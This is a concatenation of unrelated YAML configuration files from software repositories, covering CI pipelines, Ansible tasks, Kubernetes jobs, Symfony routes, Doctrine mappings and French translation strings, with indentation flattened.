state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
user_install: no
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ gem_packages }}"
- name: Install global Pip packages.
pip:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ pip_packages }}"
- name: Install pear packages.
pear:
name: "{{ item.name | default(item) }}"
state: "{{ item.state | default('present') }}"
version: "{{ item.version | default(omit) }}"
executable: "{{ item.executable | default(omit) }}"
with_items: "{{ pear_packages }}"
- name: Install cargo packages.
shell: "cargo install {{ item.name }}"
with_items: "{{ cargo_packages }}"
ignore_errors: yes
- name: Download executables.
get_url:
url: "{{ item.url }}"
dest: "{{ item.dest }}"
with_items: "{{ download_executables }}"
- name: Permissions for downloaded executables.
file:
path: "{{ item.dest }}"
state: file
mode: 755
with_items: "{{ download_executables }}"
|
workflow/requirements/macOS/ansible/playbook.yml
|
items:
- uid: "com.microsoft.azure.functions.annotation.StorageAccount"
id: "StorageAccount"
parent: "com.microsoft.azure.functions.annotation"
children:
- "com.microsoft.azure.functions.annotation.StorageAccount.value()"
langs:
- "java"
name: "StorageAccount"
nameWithType: "StorageAccount"
fullName: "com.microsoft.azure.functions.annotation.StorageAccount"
type: "Interface"
package: "com.microsoft.azure.functions.annotation"
summary: "Apply this annotation to a method if you have multiple Azure Storage triggers/input/output in that method which share the same app setting name of Azure Storage connection string."
syntax:
content: "public interface StorageAccount implements Annotation"
implements:
- "java.lang.annotation.Annotation"
- uid: "com.microsoft.azure.functions.annotation.StorageAccount.value()"
id: "value()"
parent: "com.microsoft.azure.functions.annotation.StorageAccount"
langs:
- "java"
name: "value()"
nameWithType: "StorageAccount.value()"
fullName: "com.microsoft.azure.functions.annotation.StorageAccount.value()"
overload: "com.microsoft.azure.functions.annotation.StorageAccount.value*"
type: "Method"
package: "com.microsoft.azure.functions.annotation"
summary: "Defines the app setting name that contains the Azure Storage connection string."
syntax:
content: "public abstract String value()"
return:
type: "java.lang.String"
description: "The app setting name of the connection string."
references:
- uid: "java.lang.String"
spec.java:
- uid: "java.lang.String"
name: "String"
fullName: "java.lang.String"
- uid: "com.microsoft.azure.functions.annotation.StorageAccount.value*"
name: "value"
nameWithType: "StorageAccount.value"
fullName: "com.microsoft.azure.functions.annotation.StorageAccount.value"
package: "com.microsoft.azure.functions.annotation"
- uid: "java.lang.annotation.Annotation"
name: "Annotation"
nameWithType: "Annotation"
fullName: "java.lang.annotation.Annotation"
|
docs-ref-autogen/com.microsoft.azure.functions.annotation.StorageAccount.yml
|
apiVersion: v1
kind: List
items:
- apiVersion: batch/v1
kind: Job
metadata:
name: jaeger-performance-test-job
labels:
app: jaeger-performance-test-job
group: jaeger-performance-test
spec:
template:
metadata:
labels:
app: jaeger-performance-test-job
group: jaeger-performance-test
spec:
containers:
- image: ${JAEGER_AGENT_IMAGE}
args: ["--collector.host-port=${JAEGER_COLLECTOR_HOST}:14267",
"--processor.jaeger-compact.server-queue-size=${JAEGER_AGENT_QUEUE_SIZE}",
"--processor.jaeger-compact.workers=${JAEGER_AGENT_WORKERS}"]
name: jaeger-agent
ports:
- containerPort: 6831
protocol: UDP
- image: ${PERFORMANCE_TEST_IMAGE}
imagePullPolicy: Always
name: jaeger-performance-test
ports:
- containerPort: 8080
name: http
protocol: TCP
securityContext:
privileged: false
env:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
- name: RUNNING_ON_OPENSHIFT
value: "${RUNNING_ON_OPENSHIFT}"
- name: LOGS_DIRECTORY
value: "${LOGS_DIRECTORY}"
- name: TESTS_TO_RUN
value: "${TESTS_TO_RUN}"
- name: PERFORMANCE_TEST_DATA
value: "${PERFORMANCE_TEST_DATA}"
- name: NUMBER_OF_TRACERS
value: "${NUMBER_OF_TRACERS}"
- name: NUMBER_OF_SPANS
value: "${NUMBER_OF_SPANS}"
- name: QUERY_LIMIT
value: "${QUERY_LIMIT}"
- name: QUERY_SAMPLES
value: "${QUERY_SAMPLES}"
- name: QUERY_INTERVAL
value: "${QUERY_INTERVAL}"
- name: SENDER
value: "${SENDER}"
- name: STORAGE_TYPE
value: "${STORAGE_TYPE}"
- name: SPANS_COUNT_FROM
value: "${SPANS_COUNT_FROM}"
- name: STORAGE_HOST
value: "${STORAGE_HOST}"
- name: STORAGE_PORT
value: "${STORAGE_PORT}"
- name: STORAGE_KEYSPACE
value: "${STORAGE_KEYSPACE}"
- name: JAEGER_QUERY_HOST
value: "${JAEGER_QUERY_HOST}"
- name: JAEGER_QUERY_PORT
value: "${JAEGER_QUERY_PORT}"
- name: JAEGER_COLLECTOR_HOST
value: "${JAEGER_COLLECTOR_HOST}"
- name: JAEGER_COLLECTOR_PORT
value: "${JAEGER_COLLECTOR_PORT}"
- name: JAEGER_AGENT_HOST
value: "${JAEGER_AGENT_HOST}"
- name: JAEGER_AGENT_PORT
value: "${JAEGER_AGENT_PORT}"
- name: JAEGER_AGENT_QUEUE_SIZE
value: "${JAEGER_AGENT_QUEUE_SIZE}"
- name: JAEGER_AGENT_WORKERS
value: "${JAEGER_AGENT_WORKERS}"
- name: JAEGER_FLUSH_INTERVAL
value: "${JAEGER_FLUSH_INTERVAL}"
- name: JAEGER_MAX_POCKET_SIZE
value: "${JAEGER_MAX_POCKET_SIZE}"
- name: JAEGER_SAMPLING_RATE
value: "${JAEGER_SAMPLING_RATE}"
- name: JAEGER_MAX_QUEUE_SIZE
value: "${JAEGER_MAX_QUEUE_SIZE}"
- name: COLLECTOR_PODS
value: "${COLLECTOR_PODS}"
- name: COLLECTOR_QUEUE_SIZE
value: "${COLLECTOR_QUEUE_SIZE}"
- name: COLLECTOR_NUM_WORKERS
value: "${COLLECTOR_NUM_WORKERS}"
- name: QUERY_STATIC_FILES
value: "${QUERY_STATIC_FILES}"
- name: ES_MEMORY
value: "${ES_MEMORY}"
- name: ES_BULK_SIZE
value: "${ES_BULK_SIZE}"
- name: ES_BULK_WORKERS
value: "${ES_BULK_WORKERS}"
- name: ES_BULK_FLUSH_INTERVAL
value: "${ES_BULK_FLUSH_INTERVAL}"
- name: JAEGER_AGENT_IMAGE
value: "${JAEGER_AGENT_IMAGE}"
- name: JAEGER_COLLECTOR_IMAGE
value: "${JAEGER_COLLECTOR_IMAGE}"
- name: JAEGER_QUERY_IMAGE
value: "${JAEGER_QUERY_IMAGE}"
- name: ES_IMAGE
value: "${ES_IMAGE}"
- name: ES_IMAGE_INSECURE
value: "${ES_IMAGE_INSECURE}"
- name: PERFORMANCE_TEST_IMAGE
value: "${PERFORMANCE_TEST_IMAGE}"
restartPolicy: Never
|
openshift/templates/performance-test-in-openshift.yml
|
bootstrap-js:
version: 4.0.0
js:
vendor/bootstrap/dist/js/bootstrap.js: {}
dependencies:
- charm/popper-js
# Popper
# A positioning engine - Required by Bootstrap
# ------------------------------------------------
popper-js:
version: 1.12.3
js:
vendor/popper.js/dist/umd/popper.js: {}
vendor/popper.js/dist/umd/popper-utils.js: {}
dependencies:
- core/jquery
# Font-awesome
# https://fortawesome.github.io/Font-Awesome/
# ------------------------------------------------
font-awesome-cdn:
remote: https://fontawesome.com
version: v5.7.0
license:
name: Public Licenses
url: https://fontawesome.com/license
gpl-compatible: true
css:
base:
https://use.fontawesome.com/releases/v5.7.1/css/all.css: {}
font-awesome-4-upgrade-cdn:
remote: https://fontawesome.com
version: v5.7.1
license:
name: Public Licenses
url: https://fontawesome.com/license
gpl-compatible: true
css:
base:
https://use.fontawesome.com/releases/v5.7.1/css/v4-shims.css: {}
dependencies:
- charm/font-awesome-cdn
# Video.js
# http://videojs.com/
# ------------------------------------------------
video-js-cdn:
remote: http://videojs.com/
version: 6.6.3
license:
name: Apache License, Version 2.0
url: https://github.com/videojs/video.js/blob/master/LICENSE
gpl-compatible: true
css:
base:
http://vjs.zencdn.net/6.6.3/video-js.css: { type: external, minified: true }
js:
http://vjs.zencdn.net/6.6.3/video.js: { type: external, minified: true }
# Parallax.js
#
# Simple Parallax Scrolling
# http://pixelcog.github.io/parallax.js
# ------------------------------------------------
parallax-js:
version: 1.5.0
js:
vendor/parallax.js/parallax.min.js: {}
dependencies:
- core/jquery
# Sidr
#
# Plugin for creating side menus
# https://www.berriart.com/sidr/
# ------------------------------------------------
sidr:
version: 2.2.1
js:
vendor/sidr/dist/jquery.sidr.min.js: {}
dependencies:
- core/jquery
# Smooth Scroll
# ------------------------------------------------
smooth-scroll:
js:
js/smooth-scroll.js: {}
dependencies:
- core/jquery
# Sticky-Kit
#
# A jQuery plugin for making smart sticky elements.
# http://leafo.net/sticky-kit/
# ------------------------------------------------
sticky-kit:
version: 1.1.3
js:
vendor/sticky-kit/dist/sticky-kit.js: {}
dependencies:
- core/jquery
# Waypoints
#
# Trigger a function when you scroll to an element.
# http://imakewebthings.com/waypoints/
# ------------------------------------------------
waypoints:
version: 4.0.1
js:
vendor/waypoints/lib/jquery.waypoints.min.js: {}
dependencies:
- core/jquery
waypoints-inview:
version: 4.0.1
js:
vendor/waypoints/lib/shortcuts/inview.min.js: {}
dependencies:
- charm/waypoints
waypoints-sticky:
version: 4.0.1
js:
vendor/waypoints/lib/shortcuts/sticky.min.js: {}
dependencies:
- charm/waypoints
waypoints-infinite:
version: 4.0.1
js:
vendor/waypoints/lib/shortcuts/infinite.min.js: {}
dependencies:
- charm/waypoints
# Photoswipe plugin
# http://photoswipe.com/
# ------------------------------------------------
photoswipe:
version: 4.1.2
js:
vendor/photoswipe/dist/photoswipe.min.js: {}
vendor/photoswipe/dist/photoswipe-ui-default.min.js: {}
dependencies:
- charm/photoswipe-css
photoswipe-css:
version: 4.1.2
css:
base:
vendor/photoswipe/dist/photoswipe.css: {}
vendor/photoswipe/dist/default-skin/default-skin.css: {}
# jQuery Photoswipe plugin
# https://github.com/yaquawa/jquery.photoswipe
# ------------------------------------------------
jquery-photoswipe:
version: 4.1.1
js:
vendor/jquery.photoswipe/dist/min/jquery.photoswipe-global.js: {}
dependencies:
- core/jquery
- charm/photoswipe-css
# RRSSB Social Buttons
# ------------------------------------------------
rrssb:
version: 1.14.0
css:
base:
vendor/rrssb/css/rrssb.css: {}
js:
vendor/rrssb/js/rrssb.min.js: {}
dependencies:
- core/jquery
|
web/themes/custom/themag/themes/charm/charm.libraries.yml
|
ajouter:
path: /s
defaults: { _controller: SofieneProfilBundle:Caracteristique:ajout }
afficher:
path: /afficher/
defaults: { _controller: SofieneProfilBundle:Caracteristique:affichage }
modifier_caracteristique:
path: /modifier/{q}
defaults: { _controller: SofieneProfilBundle:Caracteristique:modifier }
acceuil:
path: /acceuil
defaults: { _controller: SofieneProfilBundle:Caracteristique:acceuil}
profile_index:
path: /profile
defaults: { _controller: SofieneProfilBundle:Profile:profileIndex}
profiles_index:
path: /profiles
defaults: { _controller: SofieneProfilBundle:Profile:profileAllIndex}
profile_show:
path: /profile/show/{id}
defaults: { _controller: SofieneProfilBundle:Profile:profileShow}
profile_add:
path: /profile/add
defaults: { _controller: SofieneProfilBundle:Profile:profileAdd}
profile_edit:
path: /profile/edit
defaults: { _controller: SofieneProfilBundle:Profile:profileEdit}
actualites_index:
path: /actualites
defaults: { _controller: SofieneProfilBundle:Actualite:index}
actualites_add:
path: /actualite/add
defaults: { _controller: SofieneProfilBundle:Actualite:newActualite}
actualites_show:
path: /actualite/{id}
defaults: { _controller: SofieneProfilBundle:Actualite:articleShow}
actualites_delete:
path: /actualite/delete/{id}
defaults: { _controller: SofieneProfilBundle:Actualite:articleDelete}
profile_api_get:
path: /api/profile/get
defaults: { _controller: SofieneProfilBundle:Mobile:getProfile}
profile_api_add:
path: /api/profile/add
defaults: { _controller: SofieneProfilBundle:Mobile:addprofile}
caracteristique_api_get:
path: /api/caracteristique/get
defaults: { _controller: SofieneProfilBundle:Mobile:getCaracteristiqueById}
actualite_api_get:
path: /api/actualite/get
defaults: { _controller: SofieneProfilBundle:Mobile:getActualite}
actualite_api_add:
path: /api/actualite/add
defaults: { _controller: SofieneProfilBundle:Mobile:addActualite}
caracteristique_api_add:
path: /api/caracteristique/add
defaults: { _controller: SofieneProfilBundle:Mobile:addCaracteristique}
actualite_api_delete:
path: /api/actualite/delete
defaults: { _controller: SofieneProfilBundle:Mobile:deleteActualite}
actualite_api_rate_add:
path: /api/rate/add
defaults: { _controller: SofieneProfilBundle:Mobile:addRate}
actualite_api_rate_get:
path: /api/rate/get
defaults: { _controller: SofieneProfilBundle:Mobile:getRate}
|
src/Sofiene/ProfilBundle/Resources/config/routing.yml
|
# Going to use a predefined template of c
language: c
# Going to test on both linux and osx
os:
- linux
- osx
# Ubuntu 20.04
# Also supports bionic and others
dist: focal
# We could check on two different xcode setups, but in this case, it will be easier to use just one.
osx_image:
- xcode12 # Xcode 12.0 with macOS 10.15.5
# - xcode9.4 # Xcode 9.4 with macOS 10.13
# We want to test our program to see if it works multiple cpu architectures
# Only affects linux for now
arch:
- amd64 # Runs using a virtual machine in Google Compute Engine (https://cloud.google.com/compute)
- arm64 # Runs in a LXD container in Packet (https://www.packet.com/)
- ppc64le # Runs using a LXD container in IBM Cloud (https://www.ibm.com/cloud)
- s390x # Runs in an LXD container in IBM Cloud (https://www.ibm.com/cloud)
# MacOS runs in a vm on MacStadium (https://www.macstadium.com/) and does not support any arch other than amd64
# We want to define some variables
# Global variables will apply to all jobs
# jobs variables will create a matrix
env:
global:
# Variables are parsed as is in bash
- CCACHE_DIR=$HOME/.ccache
- LONG_STRING="Parsing spaces in programs is fun"
jobs:
- build_type=Release
- build_type=Debug
# We happen to want to test gcc and clang
compiler:
- gcc
- clang
# Use ccache to cache c files and directories to cache arbitrary directories
cache:
ccache: true
# directories:
# - $HOME/my_cache_dir
# Send notifications to an email on failure
notifications:
email:
- recipients: "<EMAIL>"
on_failure: always
# Don't build on these branches, supports a only: tag as the opposite
branches:
except:
- release
# Add some addons to auto install certain packages without needing direct calls to the package manager,
# in this case cmake
addons:
apt:
packages:
- cmake
- ninja-build
homebrew:
packages:
- cmake
- ccache
- ninja
git:
depth: false # We want to clone all of the git history
quiet: true # We don't care about git's output
# Some commands to run before anything else
before_install:
# Long block command
- |
if [[ -f /proc/cpuinfo ]]; then
sort -u /proc/cpuinfo
else
sysctl -a
fi
- cmake --version
- $CC --version
install:
# Variables are carried over between steps
- export CC="ccache $CC" CXX="ccache $CXX" PATH="/usr/local/opt/ccache/libexec:$PATH"
- "sudo chown -R $USER: $CCACHE_DIR"
- mkdir build
- cd build
# Travis provides certain predefined variables for convenience
script:
# Use preset variables
- cmake -GNinja "$TRAVIS_BUILD_DIR" -DCMAKE_BUILD_TYPE="${build_type:-Release}"
- cmake --build .
- ./example
# Steps to run before travis starts caching
before_cache:
- "sudo chown -R $USER: $CCACHE_DIR"
- ccache -c
- ccache -s
jobs:
# We want to fail once one of the jobs fail
fast_finish: true
# exclude certain jobs based on matching
exclude:
- os: osx
compiler: gcc
# Add some other jobs
include:
- name: Docker Build
language: shell
addons:
apt:
packages:
- bash
services:
- docker
env:
# Add an encrypted environment
- secure: "<KEY>
# We want to skip as much of the step because we don't need it
cache: false
before_cache: true
before_install: true
install:
- echo "$DOCKER_PASSWORD" | docker login -u 1480c1 --password-stdin
script:
- docker build --compress -t 1480c1/example:latest .
deploy:
provider: script
script: docker push 1480c1/example:latest
|
.travis.yml
|
name: Ruby Gem
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
name: Build + Publish
runs-on: ubuntu-latest
permissions:
contents: read
packages: write
steps:
- uses: actions/checkout@v2
- name: Set up Ruby 2.6
uses: actions/setup-ruby@v1
with:
ruby-version: 2.6.x
- name: Publish to GPR
run: |
mkdir -p $HOME/.gem
touch $HOME/.gem/credentials
chmod 0600 $HOME/.gem/credentials
printf -- "---\n:github: ${GEM_HOST_API_KEY}\n" > $HOME/.gem/credentials
gem build *.gemspec
gem push --KEY github --host https://rubygems.pkg.github.com/${OWNER} *.gem
env:
GEM_HOST_API_KEY: "Bearer ${{secrets.GITHUB_TOKEN}}"
OWNER: ${{ github.repository_owner }}
- name: Publish to RubyGems
run: |
mkdir -p $HOME/.gem
touch $HOME/.gem/credentials
chmod 0600 $HOME/.gem/credentials
printf -- "---\n:rubygems_api_key: ${GEM_HOST_API_KEY}\n" > $HOME/.gem/credentials
gem build *.gemspec
gem push *.gem
env:
GEM_HOST_API_KEY: "${{secrets.RUBYGEMS_AUTH_TOKEN}}"
- name: Upload a Build Artifact
uses: actions/upload-artifact@v2.2.4
with:
# Artifact name
name: # optional, default is artifact
# A file, directory or wildcard pattern that describes what to upload
path:
# The desired behavior if no files are found using the provided path.
Available Options:
warn: Output a warning but do not fail the action
error: Fail the action with an error message
ignore: Do not output any warnings or errors, the action does not fail
if-no-files-found: # optional, default is warn
# Duration after which artifact will expire in days. 0 means using default retention.
Minimum 1 day. Maximum 90 days unless changed from the repository settings page.
retention-days: # optional
- name: Setup Go environment
uses: actions/setup-go@v2.1.3
with:
# The Go version to download (if necessary) and use. Supports semver spec and ranges.
go-version: # optional
# Whether to download only stable versions
stable: # optional, default is true
# Used to pull node distributions from go-versions. Since there's a default, this is typically not supplied by the user.
token: # optional, default is ${{ github.token }}
- name: First interaction
uses: actions/first-interaction@v1.1.0
with:
# Token for the repository. Can be passed in using {{ secrets.GITHUB_TOKEN }}
repo-token:
# Comment to post on an individual's first issue
issue-message: # optional
# Comment to post on an individual's first pull request
pr-message: # optional
- name: Set up gcloud Cloud SDK environment
# You may pin to the exact commit or the version.
# uses: google-github-actions/setup-gcloud@94337306dda8180d967a56932ceb4ddcf01edae7
uses: google-github-actions/setup-gcloud@v0.2.0
with:
# Version of the gcloud SDK to install. If unspecified or set to "latest",
the latest available gcloud SDK version for the target platform will be
installed. Example: "290.0.1".
version: # optional, default is latest
# Service account email address to use for authentication. This is required
for legacy .p12 keys but can be omitted for .json keys. This is usually of
the format <name>@<project-id>.<EMAIL>.
service_account_email: # optional
# Service account key to use for authentication. This should be the JSON
formatted private key which can be exported from the Cloud Console. The
value can be raw or base64-encoded.
service_account_key: # optional
# ID of the Google Cloud project. If provided, this will configure gcloud to
use this project ID by default for commands. Individual commands can still
override the project using the --project flag which takes precedence.
project_id: # optional
# Export the provided credentials as Google Default Application Credentials.
This will make the credentials available to later steps via the
GOOGLE_APPLICATION_CREDENTIALS environment variable. Future steps that
consume Default Application Credentials will automatically detect and use
these credentials.
export_default_credentials: # optional
|
.github/workflows/gem-push.yml
|
version: 2
jobs:
build:
environment:
CC_TEST_REPORTER_ID: ea9530feaaafc4b5d0c9f84eccb3609a2ebae84b52dad6f0c194c0b5f8b60fcf
docker:
- image: circleci/php:7.1-browsers
environment:
IMG_TAG: $(echo $CIRCLE_SHA1 | cut -c -7)
DB_CONNECTION: pgsql
DB_HOST: 127.0.0.1
CACHE_DRIVER: file
JWT_SECRET: <KEY>
APP_KEY: <KEY>
APP_ENV: testing
DB_DATABASE: circle_test
DB_USERNAME: ubuntu
DB_PASSWORD: ""
- image: circleci/postgres:9.6
environment:
POSTGRES_USER: ubuntu
POSTGRES_DB: circle_test
POSTGRES_PASSWORD: ""
working_directory: ~/repo
steps:
- run:
name: Install PHP extensions
command: |
sudo apt-get install -y libpq-dev
# sudo apt-get install -y libpng-dev libjpeg-dev
# sudo docker-php-ext-configure pgsql -with-pgsql=/usr/local/pgsql
# docker-php-ext-configure gd --with-gd --with-jpeg-dir --with-png-dir --enable-gd-native-ttf
sudo docker-php-ext-install pdo pdo_pgsql pgsql
# sudo docker-php-ext-install gd
sudo apt-get install -y libfreetype6-dev libjpeg62-turbo-dev libpng-dev && sudo docker-php-ext-configure gd --with-freetype-dir=/usr/include/ --with-jpeg-dir=/usr/include/ && sudo -E docker-php-ext-install -j$(nproc) gd
- run:
name: Install Composer
command: curl -sS https://getcomposer.org/installer | sudo php -- --install-dir=/usr/local/bin --filename=composer
- checkout
# Download and cache dependencies
- restore_cache:
keys:
- v1-dependencies-{{ checksum "composer.json" }}
# fallback to using the latest cache if no exact match is found
- v1-dependencies-
- run:
name: Setup Code Climate test-reporter
command: |
# download test reporter as a static binary
curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
chmod +x ./cc-test-reporter
- run: composer install -n --prefer-dist
- save_cache:
paths:
- ./vendor
key: v1-dependencies-{{ checksum "composer.json" }}
- run:
name: Migrate Laravel Database
command: php artisan migrate:refresh --env=testing --force
- run:
name: Run tests
command: |
./cc-test-reporter before-build
./vendor/bin/phpunit --coverage-clover clover.xml
./cc-test-reporter after-build --coverage-input-type clover --exit-code $?
|
.circleci/config.yml
|
Urbem\CoreBundle\Entity\SwCgaPessoaFisica:
type: entity
table: sw_cga_pessoa_fisica
id:
numcgm:
type: integer
generator:
strategy: NONE
timestamp:
type: datetimemicrosecondpk
generator:
strategy: NONE
fields:
codCategoriaCnh:
type: integer
nullable: false
column: cod_categoria_cnh
dtEmissaoRg:
type: date
nullable: true
column: dt_emissao_rg
orgaoEmissor:
type: string
nullable: false
length: 20
column: orgao_emissor
cpf:
type: string
nullable: true
length: 11
numCnh:
type: string
nullable: false
length: 15
column: num_cnh
dtValidadeCnh:
type: date
nullable: true
column: dt_validade_cnh
codNacionalidade:
type: integer
nullable: false
column: cod_nacionalidade
codEscolaridade:
type: integer
nullable: true
column: cod_escolaridade
rg:
type: string
nullable: false
length: 15
dtNascimento:
type: date
nullable: true
column: dt_nascimento
sexo:
type: string
nullable: true
length: 1
manyToOne:
fkSwCategoriaHabilitacao:
targetEntity: Urbem\CoreBundle\Entity\SwCategoriaHabilitacao
inversedBy: fkSwCgaPessoaFisicas
joinColumns:
cod_categoria_cnh:
referencedColumnName: cod_categoria
fkSwPais:
targetEntity: Urbem\CoreBundle\Entity\SwPais
inversedBy: fkSwCgaPessoaFisicas
joinColumns:
cod_nacionalidade:
referencedColumnName: cod_pais
fkSwEscolaridade:
targetEntity: Urbem\CoreBundle\Entity\SwEscolaridade
inversedBy: fkSwCgaPessoaFisicas
joinColumns:
cod_escolaridade:
referencedColumnName: cod_escolaridade
oneToOne:
fkSwCga:
targetEntity: Urbem\CoreBundle\Entity\SwCga
inversedBy: fkSwCgaPessoaFisica
joinColumns:
numcgm:
referencedColumnName: numcgm
timestamp:
referencedColumnName: timestamp
|
src/Urbem/CoreBundle/Resources/config/doctrine/SwCgaPessoaFisica.orm.yml
|
---
- name: Create {{ context_path }} context
file: path="{{ context_path }}" state=directory
- name: Update and copy Dockerfile for adding PT
template:
src: "Dockerfile_mount_pt.j2"
dest: "{{ context_path }}/Dockerfile"
tags:
- template
- copy
- files
- docker
- name: Create PT uncompressing folder
file: path="{{ docker_context_uncompressed_installation }}" state=directory
- name: Uncompress installation files
shell: "tar zxvf {{ xvfb_ptadd_context }}/{{ compressed_installation_file.name }} -C {{ docker_context_uncompressed_installation }}"
# unarchive:
# src: "{{ compressed_installation_file.name }}"
# dest: "{{ compressed_installation_file.decompressed }}"
# creates: yes
# copy: no
tags:
- uncompress
- installation
- files
- packetTracer
- name: Remove unused PT main folder (it will be mounted from a data-only container)
shell: "{{ item }}"
become: True
with_items:
- "rm -rf {{ docker_context_uncompressed_installation }}/{{ compressed_installation_file.folders[0].backup }}"
- name: Build docker container automatically
shell: "docker build --rm -t {{ image_name }} {{ context_path }}"
ignore_errors: True
register: container_build
tags:
- build
- container
- docker
- name: Add 'packettracer' tag
shell: "docker tag -f {{ image_name }} {{ docker_image }}"
when: container_build.rc != 1
ignore_errors: True
register: container_build
tags:
- container
- docker
- tag
- name: Build docker container manually
debug: msg="{{ item }}"
when: container_build.rc == 1
with_items:
- "docker build --rm -t {{ image_name }} {{ context_path }}"
- "docker tag {{ image_name }} {{ docker_image }}"
- name: Remove temporary folder
file: path="{{ compressed_installation_file.decompressed }}" state=absent
- name: Reminder to run image built
debug: msg="docker run --volumes-from {{ data_container }} -p 5901:{{ docker_vnc_port }} -p 39000:{{ docker_pt_port }} -dti {{ docker_image }}"
when: not include_pt
|
roles/packetTracer_docker_xvfb/tasks/build_final_image.yml
|
name: CI - cli
on:
workflow_dispatch:
pull_request:
branches:
- '*'
push:
branches:
- latest
jobs:
lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Use Node.js 16.x
uses: actions/setup-node@v3
with:
node-version: 16.x
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run lint
check_docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Use Node.js 16.x
uses: actions/setup-node@v3
with:
node-version: 16.x
cache: npm
- run: make freshdocs
- run: node scripts/git-dirty.js
licenses:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Use Node.js 16.x
uses: actions/setup-node@v3
with:
node-version: 16.x
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run licenses
smoke-tests:
strategy:
fail-fast: false
matrix:
node-version:
- 12.x
- 14.x
- 16.x
platform:
- os: ubuntu-latest
shell: bash
- os: macos-latest
shell: bash
- os: windows-latest
shell: cmd
runs-on: ${{ matrix.platform.os }}
defaults:
run:
shell: ${{ matrix.platform.shell }}
steps:
- uses: actions/checkout@v3
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run smoke-tests --ignore-scripts
- name: git status
if: matrix.platform.os != 'windows-latest'
run: node scripts/git-dirty.js
test:
strategy:
fail-fast: false
matrix:
node-version:
- 12.13.0
- 12.x
- 14.15.0
- 14.x
- 16.0.0
- 16.x
platform:
- os: ubuntu-latest
shell: bash
- os: macos-latest
shell: bash
- os: windows-latest
shell: cmd
runs-on: ${{ matrix.platform.os }}
defaults:
run:
shell: ${{ matrix.platform.shell }}
steps:
- uses: actions/checkout@v3
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run test --ignore-scripts
- name: git status
if: matrix.platform.os != 'windows-latest'
run: node scripts/git-dirty.js
|
.github/workflows/ci.yml
|
image: atomfrede/gitlab-ci-jhipster-stack
<%_ if (buildTool == 'gradle') { _%>
cache:
key: "$CI_BUILD_REF_NAME"
paths:
- node_modules
- .gradle/wrapper
- .gradle/caches
<%_ } _%>
<%_ if (buildTool == 'maven') { _%>
cache:
key: "$CI_BUILD_REF_NAME"
paths:
- node_modules
- .maven
<%_ } _%>
stages:
- build
- test
- package
- release
- deploy
before_script:
- export GRADLE_USER_HOME=`pwd`/.gradle
- export MAVEN_USER_HOME=`pwd`/.maven
<%_ if (!skipClient) { _%>
- npm install
<%_ } _%>
<%_ if (buildTool == 'gradle') { _%>
gradle-build:
stage: build
script:
- ./gradlew compileJava -x check --no-daemon
<%_ if (!skipClient) { _%>
gulp-build:
stage: build
script:
- gulp build
<%_ } _%>
gradle-test:
stage: test
script:
- ./gradlew check --no-daemon
artifacts:
paths:
- build/reports/tests/*
<%_ if (testFrameworks.indexOf('gatling') !== -1) { _%>
gatling-test:
stage: test
allow_failure: true
script:
- ./gradlew gatlingRun -x cleanResources --no-daemon
before_script:
<%_ if (!skipClient) { _%>
- npm install
<%_ } _%>
- ./gradlew bootRun &
artifacts:
paths:
- build/reports/gatling/*
<%_ } _%>
gradle-repackage:
stage: package
script:
- ./gradlew bootRepackage -x check --no-daemon
artifacts:
paths:
- build/libs/*.war
<%_ } _%>
<%_ if (buildTool == 'maven') { _%>
maven-build:
stage: build
script: ./mvnw compile -Dmaven.repo.local=$MAVEN_USER_HOME
<%_ if (!skipClient) { _%>
gulp-build:
stage: build
script:
- gulp build
<%_ } _%>
maven-test:
stage: test
script:
- ./mvnw test -Dmaven.repo.local=$MAVEN_USER_HOME
artifacts:
paths:
- target/surefire-reports/*
<%_ if (testFrameworks.indexOf('gatling') !== -1) { _%>
gatling-test:
stage: test
allow_failure: true
script:
- ./mvnw gatling:execute -Dmaven.repo.local=$MAVEN_USER_HOME
before_script:
<%_ if (!skipClient) { _%>
- npm install
<%_ } _%>
- ./mvnw &
artifacts:
paths:
- target/gatling/*
<%_ } _%>
maven-package:
stage: package
script:
- ./mvnw package -Dmaven.repo.local=$MAVEN_USER_HOME
artifacts:
paths:
- target/*.war
<%_ } _%>
|
generators/app/templates/.gitlab-ci.yml
|
fr:
activemodel:
models:
education: Enseignement
activerecord:
models:
education/program:
one: Formation
other: Formations
education/program/role:
one: Rôle
other: Rôles
education/program/role/person:
one: Personne
other: Personnes
education/program/teacher:
one: Enseignant·e
other: Enseignants·es
education/school:
one: École
other: Écoles
education/school/administrator:
one: Équipe administrative
other: Équipe administrative
attributes:
education/program:
accessibility: Accessibilité
capacity: Capacité
contacts: Contacts
continuing: Formation continue
description: Description
duration: Durée
ects: Crédits ECTS
evaluation: Modalités d’évaluation
featured_image: Image à la une
featured_image_alt: Texte alternatif
level: Niveau
name: Nom
objectives: Objectifs
opportunities: Débouchés
other: Autre
pedagogy: Méthodes mobilisées
prerequisites: Prérequis
pricing: Tarifs
published: Publiée ?
registration: Modalités et délais d’accès
roles: Rôles
schools: Écoles proposant cette formation
teachers: Enseignants·es
team: Équipe
content: Contenus de la formation
results: Indicateurs de résultats
education/program/role:
people: Personnes
title: Titre
education/program/role/person:
person: Personne
education/program/teacher:
description: Description
person: Personne
education/school:
address: Adresse
administrators: Équipe administrative
city: Ville
country: Pays
name: Nom
phone: Téléphone
programs: Formations dispensées
websites: Sites webs associés
zipcode: Code postal
education/school/administrator:
description: Description
person: Personne
education:
